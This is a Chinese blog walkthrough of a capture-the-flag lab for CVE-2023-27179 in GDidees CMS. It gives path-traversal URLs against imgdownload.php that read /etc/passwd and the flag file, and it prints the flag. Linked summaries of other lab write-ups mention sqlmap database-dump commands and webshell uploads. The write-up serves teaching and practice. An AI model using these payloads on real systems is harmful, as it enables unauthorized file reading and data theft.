【春秋云境】CVE-2023-27179本地文件泄露漏洞实战

梦与流光，

于 2024-08-04 00:50:27 发布

阅读量197

点赞数 8

文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_57289348/article/details/140899632

版权

【春秋云境】CVE-2023-27179本地文件泄露漏洞实战

靶场地址：春秋云境.com

0x01靶标介绍：

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞，

漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

0x02开启靶场：

1、进入靶场后，发现页面非常朴实无华，并没有什么可利用的东西

0x03获取flag：

2、根据提示，直接访问/_admin/imgdownload.php，发现一片空白

3、再次根据提示信息，使用filename参数，测试一下ls，发现下载了一张图片，打开后是损坏的图片

http://eci-2zebrobzx3rmw8iqclxs.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=ls

4、确实可以读取本地文件，那我们接着试试读取一下/etc/passwd，将下载好的passwd.png后缀改为.txt，打开可以成功看到passwd内容

http://eci-2zebrobzx3rmw8iqclxs.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../etc/passwd

5、那么我们尝试直接读取flag文件，成功获取flag

http://eci-2zebrobzx3rmw8iqclxs.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../flag

0x04flag：

flag{167f8b97-75c2-4610-b593-f16bba668c2f}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

梦与流光，

关注关注

8
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
【春秋云境】CVE-2023-27179本地文件泄露漏洞实战

【春秋云境】CVE-2023-27179本地文件泄露漏洞实战
复制链接

扫一扫

春秋云境CVE-2023-27179

dsasdasdd的博客

04-24

196

题目：GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞，漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。发现flag{da698f58-b391-469b-a90c-5d5a2241e1ad}发现../../../../../etc/passwd应该是有东西的。只有一个界面，进入到他题目给到的路径看一眼。发现会以照片的形式下载下来但是照片是损坏的。放到repeater里面找一下flag。没有思路，去看一下原作者的poc。

春秋云境CVE-2023-52064

shr592833253的博客

04-08

719

在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。

参与评论您还未登录，请先登录后发表或查看评论

春秋云境CVE-2023-48864

2303_76653367的博客

05-09

466

SEMCMS是一套支持多种语言的外贸网站内容管理系统（CMS）。SEMCMS v4.8版本存在安全漏洞，该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。并没有什么线索啊，一开始我还以为是搜索框存在SQL注入，结果并不是。思路还是不够开阔，一直想着对搜索框进行sql注入，结果还是在参考了。2.御剑扫后台，发现install。5.选一个商品，点击批量上架，抓包。3.进入install,开始安装。第一次做这种，思维还是太局限了。4.记住密码，转到后台。

春秋云境CVE-2023-7130

2303_76653367的博客

05-09

502

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序，访问或修改数据.

春秋云境CVE-2023-1313

m0_64432806的博客

03-27

696

春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS：通过在浏览器中打开/install来运行安装

春秋云境CVE-2023-7107

2303_76653367的博客

05-09

385

3.保存POST包到sqlmap里跑，设置user-agent与cookie，爆库。2.填写注册信息并抓包。

春秋云境CVE-2023-27372

m0_64432806的博客

03-16

612

SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码，因为序列化处理不当，没有对序列化字符串进行过滤从而触发命令执行漏洞。

春秋云境CVE-2023-50564

2303_76653367的博客

05-17

614

Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件，攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。

春秋云境CVE-2023-37569

shr592833253的博客

04-10

336

Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞。随便输入信息，点击上传带有一句话木马的php文件，成功上传。又尝试了admin:password，成功进入。这时抱着试一试的态度，输入了常用的几个弱口令。首先尝试了admin:admin，发现不行。然后就找找哪有文件上传的地方，发现了一处。随后复制地址栏链接，用蚁剑连接就行啦。进入靶场发现是一个管理员登陆界面。注意flag在/目录下！一句话木马被成功解析。

春秋云境CVE-2023-0562

m0_64432806的博客

03-28

942

春秋云境CVE-2023-0562 银行储物柜管理系统是一个基于网络的应用程序，用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁

01-19

针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 ：在管理接口上执行经过身份验证的（低特权）远程代码 CVE-2023-6549：拒绝服务 2、强烈建议受影响...

CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码

08-23

CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD （Ancillary Function Driver）是Windows操作系统中的一个内核模式驱动程序。漏洞原理：该漏洞存在于AFD驱动程序处理用户...

CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码

08-23

CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。卡巴斯基披露该在野0day提权漏洞是一个越界写入（增量）漏洞，当目标系统试图扩展元数据块时被利用来获取system权限———...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8361

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

【中科院1区】Matlab实现天鹰优化算法AO-RF锂电池健康状态估计算法研究.rar

最新发布

08-02

1.版本：matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点：参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象：计算机，电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍：某大厂资深算法工程师，从事Matlab算法仿真工作10年；擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验，更多仿真源码、数据集定制私信+。替换数据可以直接使用，注释清楚，适合新手

汽车行业数字化转型报告顶层规划设计.docx

08-02

汽车行业数字化转型报告顶层规划设计.docx

毕业设计，基于ASP.NET+SqlServer开发的企业投资价值分析系统，内含完整源代码，数据库，毕业论文

08-02

毕业设计，基于ASP.NET+SqlServer开发的企业投资价值分析系统，内含完整源代码，数据库，毕业论文自中国证券市场产生以来，投资者进行投资理财迫切需要有一个科学的理论依据，在众多投资理论体系中，确定企业的价值和股票的价值，是一个重要的流派。著名的投资专家巴非特就是通过分析企业的内在价值，寻找价值被低估的股票，等到市场认可了该企业的价值，再将股票抛出，从而获得了的投机收益，其管理的基金也一度成为世界上最成功的投资基金之一。从西方国家理论界对相关领域的研究结果来看，也取得了一些成果，包括：CAPM 模型、 ICAPM模型、APT模型等，也有人用市盈率方法对股票进行定价。国内在相关的领域也取得了一些研究成果。然而，尽管国内外理论界研究成果较多，但真正适应中国证券市场、适应中国广大投资者的切实有效的理论至今仍是一个空白。在中国这样一个特殊的背景下，股权结构的特殊性、证券市场初创时期的投资性等因素，使得一些模型受到挑战，而且这些模型的精确化程度也受到限制，有必要探求新的思路和方法，为广大的投资者提供切实可靠的操作依据。对股票的价值进行评估必须综合尽可能全面的因素才能使得这些评估更加科

春秋云境CVE-2022-29464

09-05

春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码，进而导致服务器受到攻击。根据引用，在GitHub上有一个项目，其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析，可以参考引用中提到的文章。123 #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞（CVE-2022-29464）](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]